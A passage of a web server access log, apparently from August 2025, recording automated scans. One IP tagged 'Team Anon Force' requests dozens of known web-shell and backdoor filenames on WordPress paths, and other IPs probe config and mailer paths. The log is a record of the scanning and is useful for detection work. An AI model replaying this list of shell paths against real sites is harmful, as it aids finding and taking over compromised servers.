(KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:05:28 -0400] "GET /wp-admin/x.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:05:36 -0400] "GET /fw.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:05:43 -0400] "GET /server.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:05:48 -0400] "GET /wp-includes/fw.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:05:55 -0400] "GET /4.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:06:01 -0400] "GET /5.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:06:06 -0400] "GET /images/about.php HTTP/1.1" 301 251 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:06:12 -0400] "GET /xmlrpc.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:06:18 -0400] "GET /wp-load.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:06:24 -0400] "GET /wp-login.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:06:30 -0400] "GET /wp-admin/fw.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:06:36 -0400] "GET /mari.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:06:41 -0400] "GET /swm.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:06:46 -0400] "GET /wp-admin/radio.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:06:51 -0400] "GET /wp-includes/about.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:06:55 -0400] "GET /wp-content/wso.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:07:00 -0400] "GET /wp-admin/wso.php HTTP/1.1" 301 251 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:07:09 -0400] "GET /w3llstore.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:07:17 -0400] "GET /wp-content/fx.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:07:27 -0400] "GET /wp-content/x.php HTTP/1.1" 301 251 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:07:31 -0400] "GET /wp-admin/alfa.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:07:37 -0400] "GET /gank.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:07:42 -0400] "GET /style.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:07:47 -0400] "GET /s_e.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:07:52 -0400] "GET /s_ne.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:07:57 -0400] "GET /beence.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:08:03 -0400] "GET /wp-signin.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:08:10 -0400] "GET /moduless.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:08:16 -0400] "GET /export.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:08:20 -0400] "GET /legion.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:08:25 -0400] "GET /system_log.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:08:29 -0400] "GET /shells.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:08:42 -0400] "GET /wp-includes/wp-atom.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:08:47 -0400] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:08:53 -0400] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:09:00 -0400] "GET /wp-content/db-cache.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:09:07 -0400] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:09:11 -0400] "GET /wp-includes/css/wp-config.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:09:16 -0400] "GET /wp-content/themes/config.bak.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:09:20 -0400] "GET /wp-includes/images/css.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:09:24 -0400] "GET /wp-includes/css/css.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:09:30 -0400] "GET /wp-content/uploads/wp-stream.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:09:36 -0400] "GET /wp-beckup.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:09:42 -0400] "GET /wp-blog-post.php HTTP/1.1" 301 251 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:09:49 -0400] "GET /wp-content/uploads/wp-blockdown.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:09:55 -0400] "GET /wp-admin/includes/class-wp-media-list-data.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:10:00 -0400] "GET /wp-admin/style.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 152.42.157.60 - - [12/Aug/2025:07:10:00 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:07:10:01 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:07:10:01 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:07:10:01 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:07:10:05 -0400] "GET /6.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:10:11 -0400] "GET /7.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:10:15 -0400] "GET /8.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:10:22 -0400] "GET /9.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:10:27 -0400] "GET /10.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:10:31 -0400] "GET /wp_class_datalib.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:10:39 -0400] "GET /wp-includes/wp_class_datlib.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:10:46 -0400] "GET /wp-includes/pomo/wp_class_datalib.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:11:14 -0400] "GET /01.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:11:56 -0400] "GET /marijuana.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 149.102.237.41 - - [12/Aug/2025:07:12:00 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:07:12:00 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:07:12:00 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:07:12:00 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:07:12:09 -0400] "GET /1xleet.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:12:13 -0400] "GET /wp-content/shell.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:12:20 -0400] "GET /wp-content/fw.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:12:26 -0400] "GET /wp-admin/shell.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:12:32 -0400] "GET /wp-admin/wp.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:12:39 -0400] "GET /4index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.245.101 - - [12/Aug/2025:07:12:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:07:12:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:07:12:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:07:12:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:07:12:45 -0400] "GET /5index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:12:52 -0400] "GET /6index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:13:00 -0400] "GET /7index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:13:07 -0400] "GET /8index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 206.189.247.132 - - [12/Aug/2025:07:13:11 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 146.190.11.185 - - [12/Aug/2025:07:13:11 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:07:13:11 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:07:13:11 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:07:13:13 -0400] "GET /9index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:13:19 -0400] "GET /Leaf.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:13:24 -0400] "GET /Uploader.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:13:31 -0400] "GET /wp-includes/wp-red.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:13:37 -0400] "GET /.well-known/radio.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:13:43 -0400] "GET /alfashell.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:13:49 -0400] "GET /am.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:13:55 -0400] "GET /blog/fw.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:14:02 -0400] "GET /contacts.php HTTP/1.1" 301 247 "-" 